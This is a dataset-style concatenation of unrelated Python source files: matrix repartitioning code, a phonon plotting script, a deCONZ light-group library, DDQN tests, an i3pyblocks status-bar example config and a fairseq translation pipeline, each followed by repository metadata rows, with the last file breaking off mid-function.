repart_quadrant = "L"
elif part_size == (2, 1):
repart_size = (3, 1)
if traversal == (1, 0): # ( 0 // 1 / 2 )
repart_quadrant = "B"
else: # ( 0 / 1 // 2 )
repart_quadrant = "T"
elif part_size == (2, 2):
repart_size = (3, 3)
if traversal == (1, 1): # BR becomes 2x2
repart_quadrant = "BR"
elif traversal == (1, -1): # BL becomes 2x2
repart_quadrant = "BL"
elif traversal == (-1, 1): # TR becomes 2x2
repart_quadrant = "TR"
else: #if traversal == (-1, -1): # TL becomes 2x2
repart_quadrant = "TL"
else:
raise Exception
repart_flat = list(flatten_repart(repart))
self.repartition[ op.get_name() ] = (repart_size, repart_flat, repart_quadrant)
def set_repartition_size( self ):
self.repartition_size = dict()
traversals = self.linv.traversals[0][0]
#for op in self.linv.operation.operands:
for op in self.linv.linv_operands:
name = op.get_name()
traversal = traversals[op.get_name()]
if traversal == (0, 0):
continue
elif traversal in ( (0, 1), (0, -1) ): # Quadrant is 1
self.repartition_size[ name ] = ( "1", op.size[0], "bs" )
elif traversal in ( (1, 0), (-1, 0) ): # Quadrant is 1
self.repartition_size[ name ] = ( "1", "bs", op.size[1] )
elif traversal in ( (1, 1), (1, -1), (-1, 1), (-1, -1) ): # Quadrant is 11
self.repartition_size[ name ] = ( "11", "bs", "bs" )
else:
print( name, traversal )
raise Exception
def set_basic_repart( self ):
self.basic_repart = dict()
traversals = self.linv.traversals[0][0]
for op in self.linv.linv_operands:
part_size = self.linv.linv_operands_part_shape[ op.get_name() ]
if part_size == (1, 1):
repart_size = (1, 1)
elif part_size == (1, 2):
repart_size = (1, 3)
elif part_size == (2, 1):
repart_size = (3, 1)
elif part_size == (2, 2):
repart_size = (3, 3)
else:
raise Exception
self.basic_repart[ op.get_name() ] = Partitioning.repartition_shape( op, repart_size )
def set_repartition_size( self ):
self.repartition_size = dict()
traversals = self.linv.traversals[0][0]
#for op in self.linv.operation.operands:
for op in self.linv.linv_operands:
name = op.get_name()
traversal = traversals[op.get_name()]
if traversal == (0, 0):
continue
def set_cont_with( self ):
self.cont_with = dict()
traversals = self.linv.traversals[0][0]
#for op in self.linv.operation.operands:
for op in self.linv.linv_operands:
part_size = self.linv.linv_operands_part_shape[ op.get_name() ]
#part_size = self.linv.pme.part_shape[ op.get_name() ]
traversal = traversals[op.get_name()]
if part_size == (1, 1):
continue
elif part_size == (1, 2):
if traversal == (0, 1): # ( 0 | 1 || 2 ) 1 appended to L
cont_with_quadrant = "L"
else: # ( 0 || 1 | 2 ) 1 appended to R
cont_with_quadrant = "R"
elif part_size == (2, 1):
if traversal == (1, 0): # ( 0 / 1 // 2 ) 1 appended to T
cont_with_quadrant = "T"
else: # ( 0 // 1 / 2 ) 1 appended to B
cont_with_quadrant = "B"
elif part_size == (2, 2):
if traversal == (1, 1): # TL grows
cont_with_quadrant = "TL"
elif traversal == (1, -1): # TR grows
cont_with_quadrant = "TR"
elif traversal == (-1, 1): # BL grows
cont_with_quadrant = "BL"
else: #if traversal == (-1, -1): # BR grows
cont_with_quadrant = "BR"
else:
raise Exception
self.cont_with[ op.get_name() ] = cont_with_quadrant
def guard( op, traversal ):
name = op.get_name()
#op = [ o for o in self.operations.operands if o.name == op_name ][0]
if traversal == (0, 1): # L -> R
return ("L", op)
elif traversal == (0, -1): # R -> L
return ("R", op)
elif traversal == (1, 0): # T -> B
return ("T", op)
elif traversal == (-1, 0): # B -> T
return ("B", op)
elif traversal == (1, 1): # TL -> BR
return ("TL", op)
elif traversal == (1, -1): # TR -> BL
return ("TR", op)
elif traversal == (-1, 1): # BL -> TR
return ("BL", op)
elif traversal == (-1, -1): # BR -> TL
return ("BR", op)
else:
print( op_name, traversal )
raise Exception
# Flattens a matrix of matrices resulting from a repartitioning
def flatten_repart( repart ):
r, c = 0, 0
chained = []
for row in repart:
for cell in row:
_r = r
_c = c
for _row in cell:
_c = c
for _cell in _row:
chained.append( (_r, _c, _cell) )
_c += 1
_r += 1
c += len( cell.children[0] )
r = len( cell.children )
c = 0
chained.sort()
for _, _, quadrant in chained:
yield quadrant
| 39.314079 | 118 | 0.485399 | 9,551 | 0.877043 | 507 | 0.046556 | 0 | 0 | 0 | 0 | 1,571 | 0.144261 |
33aa970f90cce46880eed9d5a6bf196cf7546cbc | 939 | py | Python | NbSe2/PBE-0.01/5-epw/epc_plot.py | sinansevim/EBT617E | 0907846e09173b419dfb6c3a5eae20c3ef8548bb | [
"MIT"
] | 1 | 2021-03-12T13:16:39.000Z | 2021-03-12T13:16:39.000Z | NbSe2/PBE-0.01/5-epw/epc_plot.py | sinansevim/EBT617E | 0907846e09173b419dfb6c3a5eae20c3ef8548bb | [
"MIT"
] | null | null | null | NbSe2/PBE-0.01/5-epw/epc_plot.py | sinansevim/EBT617E | 0907846e09173b419dfb6c3a5eae20c3ef8548bb | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.mlab as mlab
import matplotlib.pyplot as plt
import matplotlib.gridspec as gs
import sys
data = np.loadtxt('NbSe2.freq.gp')
symmetryfile = 'plotband.out'
lbd = np.loadtxt("lambda.dat")
lbd_val = np.where(lbd<1 , lbd, 1)
def Symmetries(fstring):
f = open(fstring, 'r')
x = np.zeros(0)
for i in f:
if "high-symmetry" in i:
x = np.append(x, float(i.split()[-1]))
f.close()
return x
x=np.tile(data.T[0],9)
val = lbd_val.T[1:].reshape(-1)
y=data.T[1:].reshape(-1,)
fig=plt.figure(figsize=(8,6))
labels=["G","M","K","G"]
plt.scatter(x,y*0.12398,c=val,cmap="copper",s=10)
sym_tick = Symmetries(symmetryfile)
for i in range(len(sym_tick)-1):
plt.axvline(sym_tick[i],linestyle='dashed', color='black', alpha=0.75)
plt.xticks(sym_tick,labels)
plt.xlim(min(sym_tick),max(sym_tick))
plt.ylim(0)
plt.ylabel("Energy (meV)")
plt.colorbar()
plt.savefig("epc.pdf")
plt.show() | 28.454545 | 74 | 0.668797 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 117 | 0.124601 |
33ac31110619eeecf53e6d049d77405ba061c204 | 341 | py | Python | CA117/Lab_5/numcomps_32.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 6 | 2016-02-04T00:15:20.000Z | 2019-10-13T13:53:16.000Z | CA117/Lab_5/numcomps_32.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 2 | 2016-03-14T04:01:36.000Z | 2019-10-16T12:45:34.000Z | CA117/Lab_5/numcomps_32.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 10 | 2016-02-09T14:38:32.000Z | 2021-05-25T08:16:26.000Z | print(("Multiples of {}: {}\n"*6).format("3",[n for n in range(1,31)if not n%3],"3 squared",[n**2for n in range(1,31)if not n%3],"4 doubled",[n*2for n in range(1,31)if not n%4],"3 or 4",[n for n in range(1,31)if not(n%4and n%3)],"3 and 4",[n for n in range(1,31)if not(n%4or n%3)],"3 replaced",[n%3and n or'X'for n in range(1,31)]).strip())
| 170.5 | 340 | 0.609971 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 80 | 0.234604 |
33ac8b55bf9e88be389ec358327a0af6df0dcc61 | 5,594 | py | Python | pydeconz/group.py | Lokaltog/deconz | 88c726c0ed4c320af3caa82f2c2fb60937ea186a | [
"MIT"
] | null | null | null | pydeconz/group.py | Lokaltog/deconz | 88c726c0ed4c320af3caa82f2c2fb60937ea186a | [
"MIT"
] | null | null | null | pydeconz/group.py | Lokaltog/deconz | 88c726c0ed4c320af3caa82f2c2fb60937ea186a | [
"MIT"
] | null | null | null | """Python library to connect deCONZ and Home Assistant to work together."""
import logging
from .light import DeconzLightBase
_LOGGER = logging.getLogger(__name__)
class DeconzGroup(DeconzLightBase):
"""deCONZ light group representation.
Dresden Elektroniks documentation of light groups in deCONZ
http://dresden-elektronik.github.io/deconz-rest-doc/groups/
"""
def __init__(self, device_id, device, async_set_state_callback):
"""Set initial information about light group.
Set callback to set state of device.
"""
deconz_id = '/groups/' + device_id
self._all_on = device['state'].get('all_on')
self._any_on = device['state'].get('any_on')
self._bri = device['action'].get('bri')
self._class = device.get('class')
self._colormode = device['action'].get('colormode')
self._ct = device['action'].get('ct')
self._devicemembership = device.get('devicemembership')
self._effect = device['action'].get('effect')
self._hidden = device.get('hidden')
self._hue = device['action'].get('hue')
self._id = device.get('id')
self._lights = device.get('lights')
self._lightsequence = device.get('lightsequence')
self._multideviceids = device.get('multideviceids')
self._on = device['action'].get('on')
self._reachable = True
self._sat = device['action'].get('sat')
self._scenes = {}
self._x, self._y = device['action'].get('xy', (None, None))
super().__init__(deconz_id, device, async_set_state_callback)
self.async_add_scenes(device.get('scenes'), async_set_state_callback)
async def async_set_state(self, data):
"""Set state of light group.
{
"on": true,
"bri": 180,
"hue": 43680,
"sat": 255,
"transitiontime": 10
}
Also update local values of group since websockets doesn't.
"""
field = self.deconz_id + '/action'
await self._async_set_state_callback(field, data)
self.async_update({'state': data})
def as_dict(self):
"""Callback for __dict__."""
cdict = super().as_dict()
if '_scenes' in cdict:
del cdict['_scenes']
return cdict
@property
def state(self):
"""True if any light in light group is on."""
return self._any_on
@property
def groupclass(self):
""""""
return self._class
@property
def all_on(self):
"""True if all lights in light group are on"""
return self._all_on
@property
def devicemembership(self):
"""List of device ids (sensors) when group was created by a device."""
return self._devicemembership
@property
def hidden(self):
"""Indicate the hidden status of the group.
Has no effect at the gateway but apps can uses this to hide groups.
"""
return self._hidden
@property
def id(self):
"""The id of the group."""
return self._id
@property
def lights(self):
"""A list of all light ids of this group.
Sequence is defined by the gateway.
"""
return self._lights
@property
def lightsequence(self):
"""A list of light ids of this group that can be sorted by the user.
Need not to contain all light ids of this group.
"""
return self._lightsequence
@property
def multideviceids(self):
"""A list of light ids of this group.
Subsequent ids from multidevices with multiple endpoints.
"""
return self._multideviceids
@property
def scenes(self):
"""A list of scenes of the group."""
return self._scenes
def async_add_scenes(self, scenes, async_set_state_callback):
"""Add scenes belonging to group."""
self._scenes = {
scene['id']: DeconzScene(self, scene, async_set_state_callback)
for scene in scenes
if scene['id'] not in self._scenes
}
class DeconzScene:
"""deCONZ scene representation.
Dresden Elektroniks documentation of scenes in deCONZ
http://dresden-elektronik.github.io/deconz-rest-doc/scenes/
"""
def __init__(self, group, scene, async_set_state_callback):
"""Set initial information about scene.
Set callback to set state of device.
"""
self._group_id = group.id
self._group_name = group.name
self._id = scene.get('id')
self._name = scene.get('name')
self._deconz_id = group.deconz_id + '/scenes/' + self._id
self._async_set_state_callback = async_set_state_callback
async def async_set_state(self, data):
"""Recall scene to group."""
field = self._deconz_id + '/recall'
await self._async_set_state_callback(field, data)
@property
def deconz_id(self):
"""Id to call scene over API e.g. /groups/1/scenes/1."""
return self._deconz_id
@property
def full_name(self):
"""Full name."""
return self._group_name + ' ' + self._name
@property
def id(self):
"""Scene ID from deCONZ."""
return self._id
@property
def name(self):
"""Scene name."""
return self._name
def as_dict(self):
"""Callback for __dict__."""
cdict = self.__dict__.copy()
if '_async_set_state_callback' in cdict:
del cdict['_async_set_state_callback']
return cdict
| 29.442105 | 78 | 0.604934 | 5,421 | 0.969074 | 0 | 0 | 1,845 | 0.329818 | 629 | 0.112442 | 2,183 | 0.39024 |
33ad3f8d85b0ae17f8d1f68deb1a77ffc336a163 | 155 | py | Python | nocolon_main.py | paradoxxxzero/nocolon | 80bffe09e200b148cd836fd8289c59f2cd33719b | [
"BSD-3-Clause"
] | 73 | 2015-05-08T09:22:03.000Z | 2021-05-20T15:17:18.000Z | nocolon_main.py | paradoxxxzero/nocolon | 80bffe09e200b148cd836fd8289c59f2cd33719b | [
"BSD-3-Clause"
] | 3 | 2017-05-12T20:57:10.000Z | 2017-05-15T10:10:30.000Z | nocolon_main.py | paradoxxxzero/nocolon | 80bffe09e200b148cd836fd8289c59f2cd33719b | [
"BSD-3-Clause"
] | 5 | 2016-10-21T09:29:39.000Z | 2017-11-15T19:16:29.000Z | # Import the encoding
import nocolon
# Now you can import files with the nocolon encoding:
from nocolon_test import nocolon_function
nocolon_function(4)
| 19.375 | 53 | 0.819355 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 74 | 0.477419 |
33adb93bec718e8a93becbae4939a6d055886757 | 1,033 | py | Python | yarlp/tests/agent_tests/test_ddqn.py | btaba/yarlp | e6bc70afe32f8617f56180d60d6a100c83868119 | [
"MIT"
] | 12 | 2018-02-26T05:00:24.000Z | 2020-01-07T03:04:47.000Z | yarlp/tests/agent_tests/test_ddqn.py | btaba/yarlp | e6bc70afe32f8617f56180d60d6a100c83868119 | [
"MIT"
] | 6 | 2018-10-23T17:43:57.000Z | 2022-02-10T00:00:24.000Z | yarlp/tests/agent_tests/test_ddqn.py | btaba/yarlp | e6bc70afe32f8617f56180d60d6a100c83868119 | [
"MIT"
] | 1 | 2018-08-20T23:47:41.000Z | 2018-08-20T23:47:41.000Z | """
Regression tests for the REINFORCE agent on OpenAI gym environments
"""
import pytest
import numpy as np
import shutil
from yarlp.utils.env_utils import NormalizedGymEnv
from yarlp.agent.ddqn_agent import DDQNAgent
env = NormalizedGymEnv(
'PongNoFrameskip-v4',
is_atari=True
)
def test_ddqn():
agent = DDQNAgent(env, max_timesteps=10,
learning_start_timestep=1,
train_freq=5,
batch_size=1)
agent.train()
def test_seed():
agent = DDQNAgent(env, seed=143, max_timesteps=2)
agent.train()
ob, *_ = agent.replay_buffer.sample(1)
agent = DDQNAgent(env, seed=143, max_timesteps=2)
agent.train()
ob2, *_ = agent.replay_buffer.sample(1)
assert np.all(
np.array(ob) == np.array(ob2))
def test_save_models():
agent = DDQNAgent(env, max_timesteps=2)
agent.train()
agent.save('testy_ddqn')
agent = DDQNAgent.load('testy_ddqn')
agent.t = 0
agent.train()
shutil.rmtree('testy_ddqn')
| 21.978723 | 71 | 0.648596 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 135 | 0.130687 |
33aee20a7b69a67ee353d635818abf32c9a23996 | 555 | py | Python | arbeitsplan/migrations/0009_mitglied_arbeitslast.py | hkarl/svpb | 29aab0065ff69c7c4d52812508167514d635cab9 | [
"Apache-2.0"
] | 3 | 2015-02-20T14:53:17.000Z | 2020-12-01T19:29:14.000Z | arbeitsplan/migrations/0009_mitglied_arbeitslast.py | hkarl/svpb | 29aab0065ff69c7c4d52812508167514d635cab9 | [
"Apache-2.0"
] | 67 | 2015-01-06T19:48:59.000Z | 2022-03-20T16:56:22.000Z | arbeitsplan/migrations/0009_mitglied_arbeitslast.py | hkarl/svpb | 29aab0065ff69c7c4d52812508167514d635cab9 | [
"Apache-2.0"
] | 2 | 2015-12-07T09:21:10.000Z | 2015-12-30T18:36:53.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('arbeitsplan', '0008_auto_20141208_1906'),
]
operations = [
migrations.AddField(
model_name='mitglied',
name='arbeitslast',
field=models.IntegerField(default=10, help_text=b'Wieviele Stunden pro Jahr muss dieses Mitglied arbeiten?', verbose_name=b'Arbeitslast (h/Jahr)'),
preserve_default=True,
),
]
| 26.428571 | 159 | 0.646847 | 446 | 0.803604 | 0 | 0 | 0 | 0 | 0 | 0 | 166 | 0.299099 |
33aefac32f09c23801a6116bba41fc7dfac6eba4 | 789 | py | Python | fedireads/activitypub/__init__.py | johnbartholomew/bookwyrm | a6593eced7db88f0a68bd19a0e6ba441bf1053c3 | [
"CC0-1.0"
] | null | null | null | fedireads/activitypub/__init__.py | johnbartholomew/bookwyrm | a6593eced7db88f0a68bd19a0e6ba441bf1053c3 | [
"CC0-1.0"
] | null | null | null | fedireads/activitypub/__init__.py | johnbartholomew/bookwyrm | a6593eced7db88f0a68bd19a0e6ba441bf1053c3 | [
"CC0-1.0"
] | null | null | null | ''' bring activitypub functions into the namespace '''
from .actor import get_actor
from .book import get_book, get_author, get_shelf
from .create import get_create, get_update
from .follow import get_following, get_followers
from .follow import get_follow_request, get_unfollow, get_accept, get_reject
from .outbox import get_outbox, get_outbox_page
from .shelve import get_add, get_remove
from .status import get_review, get_review_article
from .status import get_rating, get_rating_note
from .status import get_comment, get_comment_article
from .status import get_quotation, get_quotation_article
from .status import get_status, get_replies, get_replies_page
from .status import get_favorite, get_unfavorite
from .status import get_boost
from .status import get_add_tag, get_remove_tag
| 46.411765 | 76 | 0.844106 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 54 | 0.068441 |
33af08b32aa16f66ff5e4dd78fe22ef1749cfda7 | 645 | py | Python | generated-libraries/python/netapp/ems/eventseverity.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | 2 | 2017-03-28T15:31:26.000Z | 2018-08-16T22:15:18.000Z | generated-libraries/python/netapp/ems/eventseverity.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | null | null | null | generated-libraries/python/netapp/ems/eventseverity.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | null | null | null | class Eventseverity(basestring):
"""
EMERGENCY|ALERT|CRITICAL|ERROR|WARNING|NOTICE|INFORMATIONAL|DEBUG
Possible values:
<ul>
<li> "emergency" - System is unusable,
<li> "alert" - Action must be taken immediately,
<li> "critical" - Critical condition,
<li> "error" - Error condition,
<li> "warning" - Warning condition,
<li> "notice" - Normal but significant condition,
<li> "informational" - Information message,
<li> "debug" - A debugging message
</ul>
"""
@staticmethod
def get_api_name():
return "eventseverity"
| 30.714286 | 69 | 0.587597 | 639 | 0.990698 | 0 | 0 | 70 | 0.108527 | 0 | 0 | 537 | 0.832558 |
33b07a2a4560968ed7e8bf918e25e34e366baaa5 | 8,110 | py | Python | example.py | DesmondTMB/i3pyblocks | 4732340ba45bf6b6b7b5bd3ff3c32af3796e7fa3 | [
"MIT"
] | 15 | 2020-09-19T20:18:34.000Z | 2021-06-12T15:16:02.000Z | example.py | DesmondTMB/i3pyblocks | 4732340ba45bf6b6b7b5bd3ff3c32af3796e7fa3 | [
"MIT"
] | 141 | 2019-08-13T23:38:47.000Z | 2021-11-10T16:20:34.000Z | example.py | DesmondTMB/i3pyblocks | 4732340ba45bf6b6b7b5bd3ff3c32af3796e7fa3 | [
"MIT"
] | 2 | 2021-05-24T17:04:35.000Z | 2021-11-09T00:43:13.000Z | #!/usr/bin/env python3
import asyncio
import logging
import signal
from pathlib import Path
import psutil
from i3pyblocks import Runner, types, utils
from i3pyblocks.blocks import ( # shell,
datetime,
dbus,
http,
i3ipc,
inotify,
ps,
pulse,
x11,
)
# Configure logging, so we can have debug information available in
# ~/.i3pyblocks.log
# Use `logging.INFO` to reduce verbosity
logging.basicConfig(filename=Path.home() / ".i3pyblocks.log", level=logging.DEBUG)
# Helper to find partitions, filtering some that we don't want to show
# Will be used later on the DiskUsageBlock
def partitions(excludes=("/boot", "/nix/store")):
partitions = psutil.disk_partitions()
return [p for p in partitions if p.mountpoint not in excludes]
async def main():
# Create a Runner instance, so we can register the modules
runner = Runner()
# Show the current i3 focused window title
# Using `.format()` (https://pyformat.info/) to limit the number of
# characters to 41
await runner.register_block(i3ipc.WindowTitleBlock(format=" {window_title:.41s}"))
# Show the current network speed for either en* (ethernet) or wl* devices
# Limiting the interface name to only 2 characters since it can get quite
# verbose
await runner.register_block(
ps.NetworkSpeedBlock(
format_up=" {interface:.2s}: {upload} {download}",
format_down="",
interface_regex="en*|wl*",
)
)
# For each partition found, add it to the Runner
# Using `{{short_path}}` shows only the first letter of the path
# i.e.: /mnt/backup -> /m/b
for partition in partitions():
await runner.register_block(
ps.DiskUsageBlock(
format=" {short_path}: {free:.1f}GiB",
path=partition.mountpoint,
)
)
await runner.register_block(ps.VirtualMemoryBlock(format=" {available:.1f}GiB"))
# Using custom icons to show the temperature visually
# So when the temperature is above 75, is shown, when it is above 50,
# is shown, etc
# Needs Font Awesome 5 installed
await runner.register_block(
ps.SensorsTemperaturesBlock(
format="{icon} {current:.0f}°C",
icons={
0: "",
25: "",
50: "",
75: "",
},
)
)
await runner.register_block(
ps.CpuPercentBlock(format=" {percent}%"),
)
# Load only makes sense depending of the number of CPUs installed in
# machine, so get the number of CPUs here and calculate the color mapping
# dynamically
cpu_count = psutil.cpu_count()
await runner.register_block(
ps.LoadAvgBlock(
format=" {load1}",
colors={
0: types.Color.NEUTRAL,
cpu_count / 2: types.Color.WARN,
cpu_count: types.Color.URGENT,
},
),
)
await runner.register_block(
ps.SensorsBatteryBlock(
format_plugged=" {percent:.0f}%",
format_unplugged="{icon} {percent:.0f}% {remaining_time}",
format_unknown="{icon} {percent:.0f}%",
icons={
0: "",
10: "",
25: "",
50: "",
75: "",
},
)
)
# ToggleBlock works by running the command specified in `command_state`,
# if it returns any text it will show `format_on`, otherwise `format_off`
# is shown
# When `format_on` is being shown, clicking on it runs `command_off`,
# while when `format_off` is being shown, clicking on it runs `command_on`
# We are using it below to simulate the popular Caffeine extension in
# Gnome and macOS
# await runner.register_block(
# shell.ToggleBlock(
# command_state="xset q | grep -Fo 'DPMS is Enabled'",
# command_on="xset s on +dpms",
# command_off="xset s off -dpms",
# format_on=" ",
# format_off=" ",
# )
# )
# This is equivalent to the example above, but using pure Python
await runner.register_block(
x11.CaffeineBlock(
format_on=" ",
format_off=" ",
)
)
# KbddBlock uses D-Bus to get the keyboard layout information updates, so
# it is very efficient (i.e.: there is no polling). But it needs `kbdd`
# installed and running: https://github.com/qnikst/kbdd
# Using mouse buttons or scroll here allows you to cycle between the layouts
# By default the resulting string is very big (i.e.: 'English (US, intl.)'),
# so we lowercase it using '!l' and truncate it to the first two letters
# using ':.2s', resulting in `en`
# You could also use '!u' to UPPERCASE it instead
await runner.register_block(
dbus.KbddBlock(
format=" {full_layout!l:.2s}",
)
)
# MediaPlayerBlock listen for updates in your player (in this case Spotify)
await runner.register_block(dbus.MediaPlayerBlock(player="spotify"))
# In case of `kbdd` isn't available for you, here is a alternative using
# ShellBlock and `xkblayout-state` program. ShellBlock just show the output
# of `command` (if it is empty this block is hidden)
# `command_on_click` runs some command when the mouse click is captured,
# in this case when the user scrolls up or down
# await runner.register_block(
# shell.ShellBlock(
# command="xkblayout-state print %s",
# format=" {output}",
# command_on_click={
# types.MouseButton.SCROLL_UP: "xkblayout-state set +1",
# types.MouseButton.SCROLL_DOWN: "xkblayout-state set -1",
# },
# )
# )
# By default BacklightBlock showns a message "No backlight found" when
# there is no backlight
# We set to empty instead, so when no backlight is available (i.e.
# desktop), we hide this block
await runner.register_block(
inotify.BacklightBlock(
format=" {percent:.0f}%",
format_no_backlight="",
command_on_click={
types.MouseButton.SCROLL_UP: "light -A 5%",
types.MouseButton.SCROLL_DOWN: "light -U 5",
},
)
)
# `signals` allows us to send multiple signals that this block will
# listen and do something
# In this case, we can force update the module when the volume changes,
# for example, by running:
# $ pactl set-sink-volume @DEFAULT_SINK@ +5% && pkill -SIGUSR1 example.py
await runner.register_block(
pulse.PulseAudioBlock(
format=" {volume:.0f}%",
format_mute=" mute",
),
signals=(signal.SIGUSR1, signal.SIGUSR2),
)
# RequestsBlock do a HTTP request to an url. We are using it here to show
# the current weather for location, using
# https://github.com/chubin/wttr.in#one-line-output
# For more complex requests, we can also pass a custom async function
# `response_callback`, that receives the response of the HTTP request and
# you can manipulate it the way you want
await runner.register_block(
http.PollingRequestBlock(
"https://wttr.in/?format=%c+%t",
format_error="",
sleep=60 * 60,
),
)
# You can use Pango markup for more control over text formating, as the
# example below shows
# For a description of how you can customize, look:
# https://developer.gnome.org/pango/stable/pango-Markup.html
await runner.register_block(
datetime.DateTimeBlock(
format_time=utils.pango_markup(" %T", font_weight="bold"),
format_date=utils.pango_markup(" %a, %d/%m", font_weight="light"),
default_state={"markup": types.MarkupText.PANGO},
)
)
# Start the Runner instance
await runner.start()
if __name__ == "__main__":
# Start the i3pyblocks
asyncio.run(main())
| 34.219409 | 87 | 0.606165 | 0 | 0 | 0 | 0 | 0 | 0 | 7,330 | 0.89576 | 4,642 | 0.567274 |
33b1e4daad97a94cb573d3a29eb181822c6e57a2 | 9,131 | py | Python | context_nmt/pipelines/context_indicators_generator.py | jesa7955/context-translation | 3cb1f4fdcf5a6829eea02d6008c4c4d7ba5ad993 | [
"MIT"
] | 2 | 2020-01-22T05:18:19.000Z | 2021-11-14T17:18:46.000Z | context_nmt/pipelines/context_indicators_generator.py | jesa7955/context-translation | 3cb1f4fdcf5a6829eea02d6008c4c4d7ba5ad993 | [
"MIT"
] | 1 | 2020-03-31T11:03:22.000Z | 2020-03-31T11:03:22.000Z | context_nmt/pipelines/context_indicators_generator.py | jesa7955/context-translation | 3cb1f4fdcf5a6829eea02d6008c4c4d7ba5ad993 | [
"MIT"
] | null | null | null | import collections
import logging
import json
import os
import luigi
import gokart
import tqdm
import torch
import sentencepiece as spm
import sacrebleu
import MeCab
from fairseq.models.transformer import TransformerModel
from fairseq.data import LanguagePairDataset
from context_nmt.pipelines.conversation_dataset_merger import (
MergeMultipleDataset,
CONCAT_TOKEN,
)
logger = logging.getLogger("luigi-interface")
class GenerateContextIndicator(gokart.TaskOnKart):
task_namespace = "context_nmt"
split_name = luigi.Parameter()
dataset_names = luigi.ListParameter()
source_paths = luigi.ListParameter()
source_lang = luigi.Parameter()
target_lang = luigi.Parameter()
context_aware_translation_models = luigi.DictParameter()
context_aware_sentencepiece_model = luigi.Parameter()
max_source_positions = luigi.IntParameter(default=128)
max_target_positions = luigi.IntParameter(default=128)
max_sentences = luigi.IntParameter(default=128)
sentence_translation_model_name = luigi.Parameter(default=None)
sentence_translation_models = luigi.DictParameter(default={})
sentence_sentencepiece_models = luigi.DictParameter(default={})
score_threhold = luigi.FloatParameter(default=0.3)
def requires(self):
return MergeMultipleDataset(
split_name=self.split_name,
dataset_names=self.dataset_names,
source_paths=self.source_paths,
translation_model_name=self.sentence_translation_model_name,
translation_models=self.sentence_translation_models,
sentencepiece_models=self.sentence_sentencepiece_models,
)
def output(self):
name_components = [
self.split_name,
self.source_lang,
self.target_lang,
self.sentence_translation_model_name,
]
return self.make_target("_".join(name_components) + "_context_indicators.pkl")
def run(self):
def tokenize_for_bleu(target):
target = tokenizer.decode_pieces(target.split())
if self.target_lang == "ja":
target = " ".join(
map(
lambda x: x.split("\t")[0],
tagger.parse(target).split("\n")[:-2],
)
)
return target
docs = self.load()
tagger = MeCab.Tagger()
tokenizer = spm.SentencePieceProcessor()
tokenizer.load(self.context_aware_sentencepiece_model)
translation_models = {}
for bias, path in self.context_aware_translation_models.items():
base_path, checkpoint_path = os.path.split(path)
model = (
TransformerModel.from_pretrained(
base_path, checkpoint_file=checkpoint_path
)
.half()
.cuda()
.eval()
)
model.args.max_source_positions = self.max_source_positions
model.args.max_target_positions = self.max_target_positions
translation_models[int(bias)] = model
args = translation_models[-1].args
task = translation_models[-1].task
criterion = task.build_criterion(args)
results = collections.defaultdict(dict)
for doc_id, doc in tqdm.tqdm(docs.items(), total=len(docs)):
parallel_doc = set(
[
sent_id
for sent_id, score in doc["pairs"]
if score >= self.score_threhold
]
)
batches = collections.defaultdict(dict)
targets = {}
for sent_id in parallel_doc:
source, target = [
tokenizer.encode_as_pieces(doc[lang][sent_id])
for lang in (self.source_lang, self.target_lang)
]
available_index = [
index for index in range(0, sent_id) if doc[self.source_lang][index]
]
# context_bias is the parameter which the model is trained with.
# context_sent_index is the index of the actual used contextual
# sentence.
targets[sent_id] = " ".join(target)
for context_bias, _ in translation_models.items():
context_sent_index = None
if context_bias != -1:
if len(available_index) < context_bias:
context_sent_index = -1
else:
context_sent_index = available_index[-context_bias]
source_context = tokenizer.encode_as_pieces(
docs[doc_id][self.source_lang][context_sent_index]
)
real_source = source_context + [CONCAT_TOKEN] + source
else:
real_source = source
if real_source and len(real_source) < self.max_source_positions:
source_sentence = " ".join(real_source)
else:
source_sentence = None
batches[context_bias][sent_id] = source_sentence
batch_results = collections.defaultdict(
lambda: collections.defaultdict(dict)
)
for context_bias, batch in batches.items():
data = [sentence for sentence in batch.values() if sentence]
if not data:
continue
real_targets = {
sent_id: targets[sent_id] for sent_id in batch if batch[sent_id]
}
model = translation_models[context_bias]
args.max_source_positions = self.max_source_positions
args.max_target_positions = self.max_target_positions
translated = model.translate(data)
# Compute BLEU score
# Make the BLEU negative to easy the results computaion
for trans, (sent_id, target) in zip(translated, real_targets.items()):
batch_results[sent_id]["bleu"][
context_bias
] = -sacrebleu.corpus_bleu(
tokenize_for_bleu(trans), tokenize_for_bleu(target)
).score
# Compute loss
src_tokens = [
model.src_dict.encode_line(
real_source,
line_tokenizer=lambda x: x.split(),
add_if_not_exist=False,
).long()
for real_source in data
]
src_lengths = [tokens.numel() for tokens in src_tokens]
tgt_tokens = [
model.tgt_dict.encode_line(
target,
line_tokenizer=lambda x: x.split(),
add_if_not_exist=False,
).long()
for target in real_targets.values()
]
tgt_lengths = [tokens.numel() for tokens in tgt_tokens]
temp_dataset = LanguagePairDataset(
src_tokens,
src_lengths,
model.src_dict,
tgt_tokens,
tgt_lengths,
left_pad_source=args.left_pad_source,
left_pad_target=args.left_pad_target,
max_source_positions=self.max_source_positions,
max_target_positions=self.max_target_positions,
)
reports = collections.defaultdict(list)
iterator = task.get_batch_iterator(
dataset=temp_dataset, max_sentences=self.max_sentences,
)
for sample in iterator.next_epoch_itr(shuffle=False):
sample["net_input"]["src_tokens"] = sample["net_input"][
"src_tokens"
].cuda()
sample["net_input"]["src_lengths"] = sample["net_input"][
"src_lengths"
].cuda()
sample["net_input"]["prev_output_tokens"] = sample["net_input"][
"prev_output_tokens"
